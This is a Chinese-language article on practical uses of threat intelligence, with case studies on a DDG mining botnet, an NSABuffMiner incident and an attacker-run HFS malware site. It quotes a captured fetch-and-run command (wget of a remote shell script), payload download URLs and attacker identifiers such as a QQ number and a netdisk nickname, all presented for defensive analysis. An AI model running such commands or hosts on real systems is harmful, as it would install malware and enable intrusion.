現今網絡攻防環境愈發複雜,威脅情報現在作為一種彌補攻防信息不對稱的安全技術逐漸得到了廣泛的認識,更多企業也開始接受併購買威脅情報數據來建設企業安全。筆者對當下的威脅情報應用較多的場景進行了一些總結,期待與業界各位權威進一步交流。
1 什麼是威脅情報?
在探討威脅情報應用的問題之前,我們必須首先要回答清楚:什麼是威脅情報?
SANS研究院的說法是:針對安全威脅、威脅者、利用、惡意軟件、漏洞和危害指標,所收集的用於評估和應用的數據集。Gartner的解釋則是:威脅情報是基於證據的知識,包括上下文、機制、指標、隱含和可操作的建議,針對一個現存的或新興的威脅,可用於做出相應決定的知識。
很顯然,單一的信息或數據一般算不上威脅情報,只有經過分析處理過的準確有價值的信息才能算是威脅情報。我們對這些解釋提取一個公約數,可以給威脅情報一個簡明的定義:以證據為基礎的知識(包括背景、機制、指標、含義以及可採取的行動建議),關於當前的或正在出現的威脅或危害資產的,可用於通報有關該主題對威脅或危險作出反應的決定。
2 威脅情報的應用場景
威脅情報有以下幾個常見的應用場景:
● 攻擊檢測與防禦
● 事件監測與響應
● 攻擊團伙追蹤
● 威脅狩獵
● 基於情報驅動的漏洞管理
● 暗網情報發現
接下來筆者將分別進行闡述。
一、攻擊檢測與防禦
威脅情報應用於攻擊檢測與防禦是應用得較多的場景之一。通過機讀情報以訂閱方式集成到現有的安全產品之中,實現與安全產品協同工作,如SIEM、IDS等產品中,可以有效的縮短平均檢測時間(MTTD:Mean-Time-to-Detect),當平均檢測時間降低即表示著企業的安全能力得到了提升。威脅情報對已有的IP/Domain/HASH等信譽庫進行了標準化的補充,可以讓其可以更加有效發揮作用。
準確及時的失陷標示數據可以幫助用戶快速處理已經或正在發生的威脅,比如黑樣本的HASH、對外連接的C&C及Downloader服務器的IP或域名,網絡邊界設備或運行於主機上的Agent可以通過簡單的匹配就能發現並採用自動化的應對措施。
下面通過應用實例來說明威脅情報在攻擊檢測與防禦中的作用。筆者從部署的蜜網中發現了一條攻擊信息wget -q -O- http://67.205.168.20:8000/i.sh。鏈接的主要內容為shell腳本,功能是遠程下載挖礦程序,創建定時任務。
由上圖可以得知攻擊載荷下載鏈接為
http://67.205.168.20:8000/static/4011/ddgs.i686
http://67.205.168.20:8000/static/4011/ddgs.x86_64
經過分析確認為DDG殭屍網絡病毒,將信息整理為機讀情報(STIX格式),大致如下圖:
應用於其他安全產品中需要轉化成安全產品的標準格式,例如IDS產品。IP類的可以應用於NIDS中,惡意軟件的hash可應用於HIDS,例如下圖將上述情報中的IP其轉化成Snort規則,可以直接在網絡層面對其檢測:
二、事件監測與響應
事件監測與響應也是威脅情報使用較多的一個場景之一。安全人員對檢測到的網絡威脅進行響應,調查已發生或者正在發生的事件。在此場景下,使用威脅情報是為了縮短平均響應時間(MTTR:Mean-Time-to-Respond)。
在日常處理應急過程中,事中階段,安全人員會根據IOC信息以及其他相關信息快速識別攻擊,或者根據系統所感染顯示的一些特徵,如外連的IP、註冊表信息、進程名等去查詢是否有出現類似的情報信息(開源情報或者內部情報),來明確威脅攻擊類型,來源以及攻擊的意圖等。快速評估企業內部資產受損程度及影響面,判斷攻擊所處的階段,做出針對性的措施來阻止攻擊進一步擴大;事後階段,安全人員可以根據事件中出現的新的情報信息進行增補,如新變種、新C&C等,方便後續安全運營以及更好地應對同類型的攻擊。
舉個例子,客戶反饋個人PC異常卡頓,可能感染了病毒。現場取證之後,安全分析人員確認為挖礦攻擊事件。首先查看了計劃任務,發現創建了兩個SYSTEM權限的任務計劃。路徑分別為
C:\\Windows\\Fonts\\Mysql\\wai.bat
C:\\Windows\\Fonts\\Mysql\\nei.bat。
根據病毒所體現的行為特徵(CPU資源佔用高、可疑的計劃任務)結合開源情報,可以快速確定其為NSABuffMiner家族,可能為變種。報告中所分享的IOC信息,幫助安全運維人員定位到可疑進程的路徑以及外連礦池地址,優先封禁外連的礦池IP,然後清除PC上所感染的惡意代碼,修補永恆之藍漏洞。事後階段,對整個攻擊事件進行復盤分析,發現攻擊者首先入侵了服務器,然後使用了永恆之藍系列漏洞利用工具,進而感染了內網。
三、攻擊團伙追蹤
威脅情報追蹤攻擊團伙是一個長期的運營過程,需要積累一定量的攻擊團伙的TTP,即戰術、技術、過程三個維度。當然這只是針對高級攻擊組織,對於小黑客來說,根據一些攻擊中暴露的細節並結合威脅情報就可以追溯得到。下面通過一個例子來說明威脅情報在這個場景下的作用。
攻擊者搭建HFS惡意站點傳播惡意軟件,站點url:http://125.65.109.98:8080/,監測日期為2018年6月28號。攻擊者惡意工具軟件類型包括了後門遠控、DDOS軟件、門羅幣挖礦、爆破工具、抓雞工具、掃描工具,還有用於灰產的刷量工具。
根據此IP,我們在情報平臺上查詢Passivedns,可以得知該IP綁定的域名是qq461677041.f3322.org。
根據qq461677041字符查找相關信息。
同時我們還挖掘到該開發者的百度網盤,暱稱“love小科520”,分享的工具與HFS站點如出一轍。
再細深挖,根據其微信號和QQ為同一賬號,可以找到對應的攻擊者畫像,確認攻擊者的活動範圍,在此不再贅述。
使用威脅情報對攻擊團伙進行追溯其實就是用好手上的數據,儘可能提煉攻擊團伙的TTP,再結合基礎數據生成攻擊團伙的攻擊畫像,跟進分析相似度高的攻擊事件,不斷總結更新攻擊者畫像。
四、威脅狩獵
威脅狩獵是一種當前較新的高級威脅發現的方法,旨在事件發生之前,提前發現威脅,由被動變為主動。這需要安全分析人員具有較高的威脅發現能力,主動去根據網絡中的異常情況來發現高級威脅,而威脅情報就能給與安全分析人員很好的幫助。威脅獵捕是對各種數據源,所以IOC情報在威脅狩獵中可以起到重要作用。威脅狩獵模型中使用IOC-Based Hunting和TTP-Based Hunting。
五、基於情報驅動的漏洞管理
漏洞情報管理的主要目的是為了保護用戶資產、數據傳輸過程。結合威脅情報,可以幫助安全運維人員快速定位影響資產安全的關鍵風險點。當漏洞情報被披露時,企業可以根據漏洞情報再結合企業的資產信息來分析漏洞對整個業務的影響,提前修復關鍵漏洞。特別是在0day漏洞的在野利用事件爆發的時候,漏洞情報就顯得格外重要。
2017年Wanncry勒索病毒利用的MS17-010漏洞感染了大量的設備終端,之所以會有這種大規模的漏洞攻擊爆發,Shadowbroker發佈漏洞利用工具的時間為4月14日,較勒索病毒爆發期還有將近一個月的時間差。如果當時採用基於情報驅動漏洞管理的機制之下,完全可以將企業的損失降低。當然企業和普通用戶不可能自己建立一套漏洞情報系統,所以就需要外部情報系統推送漏洞情報來輔助企業安全人員來定位資產風險點。
六、暗網情報發現
暗網中存在大量非法交易,惡意代碼、毒品、數據販賣等。近年國內也發生了多起大型數據洩露的事件,諸如2018年華住酒店數據洩露並在暗網出售;Acfun遭黑客攻擊數據洩露。下圖為華住旗下酒店開放數據在暗網出售截圖:
企業需要此類的情報信息來避免被薅羊毛、數據洩露、業務風險等。雖然有可能對於企業只是亡羊補牢的操作,但是在一定程度上能夠為企業提供信息,幫助企業定位到可疑的攻擊點。
3 結語
威脅情報無疑是當前安全行業的一個熱點關鍵詞,也被業界寄予了厚望。但就實際的應用和經驗來看,安全領域不存在單點的銀彈技術,威脅情報固然在某些方面有極高的能力,但並非解決安全問題的“靈丹妙藥”——威脅情報的應用場景雖然多種多樣,但是如何生產優質的情報,如何形成情報閉環、推動情報落地,這些才是問題的關鍵。
閱讀更多 e安教育 的文章
